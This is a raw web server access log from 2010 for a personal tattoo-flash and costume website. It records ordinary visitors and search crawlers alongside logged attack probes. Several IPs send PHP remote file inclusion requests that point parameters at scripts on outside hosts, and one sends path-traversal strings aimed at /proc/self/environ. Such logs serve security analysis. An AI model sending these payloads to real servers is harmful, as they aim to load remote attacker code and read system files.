66.235.124.132 - - [02/May/2010:08:12:06 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
67.218.116.164 - - [02/May/2010:08:13:29 -0500] "GET /logs/access_log.1243036800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.195.112.180 - - [02/May/2010:08:16:17 -0500] "GET /logs/ HTTP/1.0" 200 3968 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.129.119.13 - - [02/May/2010:08:17:23 -0500] "GET /logs/access_log.1234396800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [02/May/2010:08:17:36 -0500] "GET /logs/access_log.1255651200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
92.100.130.185 - - [02/May/2010:08:21:13 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://images.google.ru/imglanding?q=old%20school%20tattoos&imgurl=http://www.tattoonow.com/images/catalog/products/zg4medium.jpg&imgrefurl=http://www.andreatattoo.splinder.com/post/14866006/Tatuaggi%2B%2522Old%2BSchool%2522&usg=__BvyJ88zIn_AWj78H3GSYVmi-CrA=&h=261&w=200&sz=11&hl=ru&sig2=48o34hv5AloiVWYndJBHYw&um=1&itbs=1&tbnid=HaZO9dmRqJQjVM:&tbnh=112&tbnw=86&prev=/images%3Fq%3Dold%2Bschool%2Btattoos%26tbnid%3D9SpwlRwh0wlLlM:%26tbnh%3D0%26tbnw%3D0%26um%3D1%26hl%3Dru%26lr%3D%26newwindow%3D1%26safe%3Doff%26client%3Dfirefox-a%26sa%3DX%26rls%3Dorg.mozilla:ru:official%26channel%3Ds%26imgtype%3Di_similar%26tbs%3Disch:1&ei=O3zdS5zWIpmJ_Ab-3NH7Bg&tbnid=9SpwlRwh0wlLlM:&tbnh=0&tbnw=0&um=1&lr=&newwindow=1&safe=off&client=firefox-a&sa=X&rls=org.mozilla:ru:official&channel=s&imgtype=i_similar&tbs=isch:1&start=15""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729) WebMoney Advisor"
207.46.195.229 - - [02/May/2010:08:21:54 -0500] "GET /logs/access_log.1233532800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.87 - - [02/May/2010:08:23:25 -0500] "GET /logs/access_log.1241395200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [02/May/2010:08:23:37 -0500] "GET /logs/access_log.1176336000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
189.108.172.26 - - [02/May/2010:08:23:52 -0500] "GET /logs/access_log.1270598400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://e-regis.cmtc.ac.th/cvs/id1.txt?????? HTTP/1.1" 404 338 "-""Mozilla/5.0"
189.108.172.26 - - [02/May/2010:08:23:52 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://e-regis.cmtc.ac.th/cvs/id1.txt?????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
189.108.172.26 - - [02/May/2010:08:23:52 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://e-regis.cmtc.ac.th/cvs/id1.txt?????? HTTP/1.1" 404 314 "-""Mozilla/5.0"
189.108.172.26 - - [02/May/2010:08:23:53 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://e-regis.cmtc.ac.th/cvs/id1.txt?????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
189.108.172.26 - - [02/May/2010:08:23:53 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://e-regis.cmtc.ac.th/cvs/id1.txt?????? HTTP/1.1" 404 314 "-""Mozilla/5.0"
189.108.172.26 - - [02/May/2010:08:23:53 -0500] "GET /logs/access_log.1270598400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://e-regis.cmtc.ac.th/cvs/id1.txt?????? HTTP/1.1" 404 338 "-""Mozilla/5.0"
94.100.181.241 - - [02/May/2010:08:24:30 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mail.Ru/1.0"
94.100.181.241 - - [02/May/2010:08:24:30 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 2651 "-""Mail.Ru/1.0"
94.100.181.241 - - [02/May/2010:08:24:31 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""Mail.Ru/1.0"
94.100.181.241 - - [02/May/2010:08:24:31 -0500] "GET /costume/costume2.htm HTTP/1.0" 200 1799 "-""Mail.Ru/1.0"
94.100.181.241 - - [02/May/2010:08:24:31 -0500] "GET /costume/thmb5.htm HTTP/1.0" 200 3414 "-""Mail.Ru/1.0"
94.100.181.241 - - [02/May/2010:08:24:32 -0500] "GET /costume/thmb7.htm HTTP/1.0" 200 2938 "-""Mail.Ru/1.0"
94.100.181.241 - - [02/May/2010:08:24:32 -0500] "GET /costume/thmb3.htm HTTP/1.0" 200 3450 "-""Mail.Ru/1.0"
94.100.181.241 - - [02/May/2010:08:24:33 -0500] "GET /costume/links.htm HTTP/1.0" 200 1029 "-""Mail.Ru/1.0"
94.100.181.241 - - [02/May/2010:08:24:36 -0500] "GET /costume/thmb8.htm HTTP/1.0" 200 3054 "-""Mail.Ru/1.0"
94.100.181.241 - - [02/May/2010:08:24:37 -0500] "GET /costume/thmb4.htm HTTP/1.0" 200 3851 "-""Mail.Ru/1.0"
94.100.181.241 - - [02/May/2010:08:24:38 -0500] "GET /costume/thmb9.htm HTTP/1.0" 200 2227 "-""Mail.Ru/1.0"
94.100.181.241 - - [02/May/2010:08:24:38 -0500] "GET /costume/index1.htm HTTP/1.0" 200 21829 "-""Mail.Ru/1.0"
94.100.181.241 - - [02/May/2010:08:24:39 -0500] "GET /costume/thmb6.htm HTTP/1.0" 200 3210 "-""Mail.Ru/1.0"
94.100.181.241 - - [02/May/2010:08:24:40 -0500] "GET /costume/thmb2.htm HTTP/1.0" 200 3962 "-""Mail.Ru/1.0"
94.100.181.241 - - [02/May/2010:08:24:40 -0500] "GET /costume/thmb1.htm HTTP/1.0" 200 3957 "-""Mail.Ru/1.0"
94.100.181.241 - - [02/May/2010:08:24:42 -0500] "GET /costume/costume1.htmtomdolan.pconline.com/costume/costume1.htm HTTP/1.0" 404 334 "-""Mail.Ru/1.0"
94.100.181.241 - - [02/May/2010:08:24:42 -0500] "GET /costume/cd-page1.htm HTTP/1.0" 200 1189 "-""Mail.Ru/1.0"
94.100.181.241 - - [02/May/2010:08:24:43 -0500] "GET /costume/shipping.htm HTTP/1.0" 404 292 "-""Mail.Ru/1.0"
207.46.204.227 - - [02/May/2010:08:31:54 -0500] "GET /logs/access_log.1159315200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.207.4.74 - - [02/May/2010:08:34:36 -0500] "GET /logs/access_log.1261699200 HTTP/1.1" 404 310 "http://tomdolan.pconline.com/logs/access_log.1261699200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
218.38.34.19 - - [02/May/2010:08:38:22 -0500] "GET /logs/access_log.1264204800/home_index.php?path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.38.34.19 - - [02/May/2010:08:38:22 -0500] "GET /home_index.php?path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.38.34.19 - - [02/May/2010:08:38:22 -0500] "GET /logs/home_index.php?path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
188.130.32.85 - - [02/May/2010:08:38:39 -0500] "GET /logs//modules/userstop/userstop.php?exbb[home_path]=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
188.130.32.85 - - [02/May/2010:08:38:39 -0500] "GET /logs/access_log.1263945600//modules/userstop/userstop.php?exbb[home_path]=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
188.130.32.85 - - [02/May/2010:08:38:39 -0500] "GET //modules/userstop/userstop.php?exbb[home_path]=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.195.112.180 - - [02/May/2010:08:39:19 -0500] "GET /logs/access_log.1229472000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
188.130.32.85 - - [02/May/2010:08:39:44 -0500] "GET //modules/userstop/userstop.php?exbb[home_path]=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
188.130.32.85 - - [02/May/2010:08:39:44 -0500] "GET /logs/access_log.1263945600//modules/userstop/userstop.php?exbb[home_path]=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
188.130.32.85 - - [02/May/2010:08:39:44 -0500] "GET /logs//modules/userstop/userstop.php?exbb[home_path]=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
114.141.2.7 - - [02/May/2010:08:40:06 -0500] "GET /logs/access_log.1263945600//modules/userstop/userstop.php?exbb[home_path]=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
114.141.2.7 - - [02/May/2010:08:40:06 -0500] "GET /logs//modules/userstop/userstop.php?exbb[home_path]=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
114.141.2.7 - - [02/May/2010:08:40:06 -0500] "GET //modules/userstop/userstop.php?exbb[home_path]=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:08:42:13 -0500] "GET /logs/access_log.1251763200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.240 - - [02/May/2010:08:42:54 -0500] "GET /logs/access_log.1155340800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
220.181.7.114 - - [02/May/2010:08:45:13 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
118.217.216.132 - - [02/May/2010:08:47:55 -0500] "GET /logs/access_log.1264377600/werbungFrame.php?do=http://www.boomong.com/bbs//data/idxx.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
118.217.216.132 - - [02/May/2010:08:47:55 -0500] "GET /werbungFrame.php?do=http://www.boomong.com/bbs//data/idxx.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
118.217.216.132 - - [02/May/2010:08:47:55 -0500] "GET /logs/werbungFrame.php?do=http://www.boomong.com/bbs//data/idxx.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
118.217.216.132 - - [02/May/2010:08:48:28 -0500] "GET /logs/access_log.1264377600/werbungFrame.php?do=http://www.boomong.com/bbs//data/idxx.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
118.217.216.132 - - [02/May/2010:08:48:28 -0500] "GET /werbungFrame.php?do=http://www.boomong.com/bbs//data/idxx.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
118.217.216.132 - - [02/May/2010:08:48:29 -0500] "GET /logs/werbungFrame.php?do=http://www.boomong.com/bbs//data/idxx.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
208.115.111.248 - - [02/May/2010:08:50:05 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
118.217.216.132 - - [02/May/2010:08:50:36 -0500] "GET /logs/access_log.1263945600/werbungFrame.php?do=http://www.boomong.com/bbs//data/idxx.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
118.217.216.132 - - [02/May/2010:08:50:38 -0500] "GET /logs/access_log.1263945600/werbungFrame.php?do=http://www.boomong.com/bbs//data/idxx.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
72.52.200.190 - - [02/May/2010:08:51:48 -0500] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
72.52.200.190 - - [02/May/2010:08:51:48 -0500] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
72.52.200.190 - - [02/May/2010:08:51:49 -0500] "GET /logs/access_log.1247443200/index.php?_SERVER[DOCUMENT_ROOT]=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
72.52.200.190 - - [02/May/2010:08:51:49 -0500] "GET /index.php?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
72.52.200.190 - - [02/May/2010:08:51:49 -0500] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
72.52.200.190 - - [02/May/2010:08:51:49 -0500] "GET /logs/access_log.1247443200/index.php?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
72.52.200.190 - - [02/May/2010:08:51:49 -0500] "GET /index.php?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
72.52.200.190 - - [02/May/2010:08:51:49 -0500] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
72.52.200.190 - - [02/May/2010:08:51:49 -0500] "GET /logs/access_log.1247443200/index.php?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
72.52.200.190 - - [02/May/2010:08:51:49 -0500] "GET /logs/errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
72.52.200.190 - - [02/May/2010:08:51:49 -0500] "GET /errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
72.52.200.190 - - [02/May/2010:08:51:49 -0500] "GET /logs/access_log.1247443200/errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
92.28.251.186 - - [02/May/2010:08:52:35 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.co.uk/search?hl=en&client=firefox-a&hs=xru&rls=org.mozilla:en-GB:official&channel=s&ei=kIPdS8WcHI300gSf99G8Bw&sa=X&oi=spellfullpage&resnum=0&ct=result&cd=2&ved=0CAYQvwUoAQ&q=1930s+tattoo+flash&spell=1""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:35 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
218.38.34.19 - - [02/May/2010:08:52:35 -0500] "GET //?path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
218.38.34.19 - - [02/May/2010:08:52:35 -0500] "GET /logs//?path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 200 3998 "-""Mozilla/5.0"
218.38.34.19 - - [02/May/2010:08:52:35 -0500] "GET /logs/access_log.1263081600//?path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
92.28.251.186 - - [02/May/2010:08:52:37 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:38 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:38 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:38 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:38 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:38 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:38 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:38 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:38 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:38 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:39 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:39 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:39 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:52 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:53 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:53 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:53 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:53 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:53 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:53 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:53 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:53 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:53 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:52:53 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:53:02 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:53:03 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:53:03 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:53:03 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:53:03 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:53:03 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:53:03 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:53:04 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:53:04 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
92.28.251.186 - - [02/May/2010:08:53:04 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
